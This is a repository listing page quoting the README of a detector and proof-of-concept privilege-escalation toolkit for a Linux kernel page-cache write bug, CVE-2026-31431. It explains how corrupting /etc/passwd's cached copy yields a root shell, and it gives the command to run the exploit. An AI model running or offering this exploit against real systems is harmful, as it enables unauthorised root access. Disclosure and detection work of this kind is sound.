GitFeed
Back to feed

rootsecdev/cve_2026_31431

rootsecdev/cve_2026_31431
496
+18/day
105
Python

Exploit POC for CVE_2026_31431

From the README

CVE-2026-31431 ("Copy Fail") Toolkit

Detector and proof-of-concept LPE for the Linux algif_aead / authencesn page-cache scratch-write bug disclosed 2026-04-29.

Disclosure writeup:

Authorization

Use only on hosts you own or are explicitly engaged to assess. The LPE modifies in-memory state (page cache) but the technique is real privilege escalation — running it on systems without authorization is illegal in most jurisdictions.

Vulnerability summary

algif_aead runs AEAD operations in-place (req->src == req->dst). When the source data is fed in via splice() from a regular file, the destination scatterlist contains references to the file's page-cache pages — i.e. the kernel will write into them. The authencesn(hmac(sha256), cbc(aes)) algorithm then performs a 4-byte "scratch" write of the AAD's seqno_lo field (bytes 4–7 of the sendmsg-supplied AAD) into that destination, corrupting the page-cache copy of the file.

Because the on-disk file is never modified, there is no on-disk signature; the corruption is observed only by readers that share the page cache. /etc/passwd and /usr/bin/su are both world-readable, so an unprivileged local user can corrupt the running kernel's view of either.

Affected: kernels carrying commit 72548b093ee3 (in-place AEAD, 2017) without the upstream revert. The disclosure confirmed Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 14.3, and SUSE 16, but the underlying primitive predates that range.

Files

| File | Purpose | | --- | --- | | test_cve_2026_31431.py | Non-destructive detector. Operates on a sentinel file in a temp dir; never touches system binaries. | | exploit_cve_2026_31431.py | LPE. Flips the running user's UID to 0 in /etc/passwd's page cache, then invokes su for a root shell. |

Both scripts are pure Python 3.10+ stdlib.

Quick start

# 1. Detect
python3 test_cve_2026_31431.py
#   exit 0 = not vulnerable, 2 = vulnerable, 1 = test error

# 2. Exploit (interactive — su will prompt for your own password)
python3 exploit_cve_2026_31431.py --shell

Detector usage

python3 test_cve_2026_31431.py

What it does:

  1. Confirms AF_ALG and the authencesn(hmac(sha256),cbc(aes)) algorithm are reachable from an unprivileged process.
  2. Creates a 4 KiB sentinel file in a temp directory, populates the page cache.
  3. Sends 8 bytes of AAD inline via sendmsg+cmsg with seqno_lo set to the marker PWND, then os.splice()s 32 bytes of the sentinel's page-cache page into the AF_ALG op socket.
  4. Calls recv() to drive decryption. The auth check fails with EBADMSG; the scratch write fires regardless.
  5. Re-reads the file (page cache, not disk) and looks for the marker.

Output classes:

  • Precondition not metAF_ALG or authencesn unavailable. Exit 0.
  • VULNERABLE to CVE-2026-31431 — marker PWND landed in the spliced page. Exit 2.
  • Page cache MODIFIED via in-place AEAD splice path — the page was written to but the marker did
View on GitHub